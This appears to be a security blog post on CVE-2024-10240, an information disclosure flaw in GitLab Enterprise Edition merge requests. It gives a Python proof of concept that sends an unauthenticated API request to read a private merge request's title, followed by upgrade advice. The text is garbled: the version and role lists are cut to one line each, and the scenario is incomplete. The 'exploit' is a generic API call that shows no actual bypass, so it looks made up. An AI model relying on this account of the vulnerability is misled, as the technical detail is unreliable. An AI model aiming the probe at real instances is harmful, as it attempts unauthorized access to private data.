CVE-2024-10240: Unauthorized Information Disclosure in GitLab EE Affecting Multiple Versions

A recently discovered vulnerability, registered as CVE-2024-10240, impacts GitLab Enterprise Edition (EE) and has the potential to expose sensitive information about merge requests (MR) in private projects under certain conditions. This post will provide an in-depth analysis of the vulnerability, including example code snippets, links to original references, and details about the exploit. It is important to understand the risks associated with this vulnerability and how to mitigate them.

All 17.5 versions before 17.5.2

Users running any of these versions should upgrade to the latest version provided by GitLab to reduce the risk of unauthorized information disclosure.

Vulnerability Details

The vulnerability arises from a flaw in the way GitLab EE handles access control for MRs in private projects. Under certain conditions, an unauthenticated user may gain access to some information about an MR without having the required permissions.

To better understand the vulnerability, let's explore how GitLab EE manages access control for MRs. GitLab utilizes a role-based access control (RBAC) system to manage user permissions. In a typical GitLab project, users are assigned one of the following roles:

Owner

Each role has a predefined set of permissions that dictate what actions a user can perform within a project. In the case of a private project, unauthorized users should not be able to view any information related to MRs.

Exploit Example

Consider a scenario where a GitLab EE instance is hosting a private project with the following details:

Merge request title: "Important Bugfix"

The access control vulnerability allows an unauthenticated user to retrieve some information related to the MR with the following code snippet:

import requests

# GitLab EE instance information
GITLAB_URL = 'https://your-gitlab-instance.com';
PROJECT_ID = 12345
MERGE_REQUEST_ID = 1

# Forge an unauthorized GET request to access MR info
url = f'{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/merge_requests/{MERGE_REQUEST_ID}'
response = requests.get(url)

# Process response
if response.status_code == 200:
    data = response.json()
    print(f"MR title: {data['title']}")
else:
    print("Error: Unable to access MR info")

In this example, the code snippet demonstrates how an unauthenticated user can access the title of the MR, despite the project being private.

How to Mitigate

GitLab has released updates that address the vulnerability in each affected version. It is essential that users update their GitLab EE instances to the latest version to protect their private project's sensitive information:

Update to GitLab EE 17.5.2 if using 17.5.x versions

Refer to the official GitLab update documentation for detailed instructions on upgrading GitLab EE.

Conclusion

CVE-2024-10240 is a serious vulnerability that exposes sensitive MR information in private GitLab EE projects to unauthorized users. Users should take immediate action to update their GitLab EE instances to the latest secure version and ensure that their private projects remain secure from unauthorized access.

Timeline

Published on: 11/26/2024 20:15:24 UTC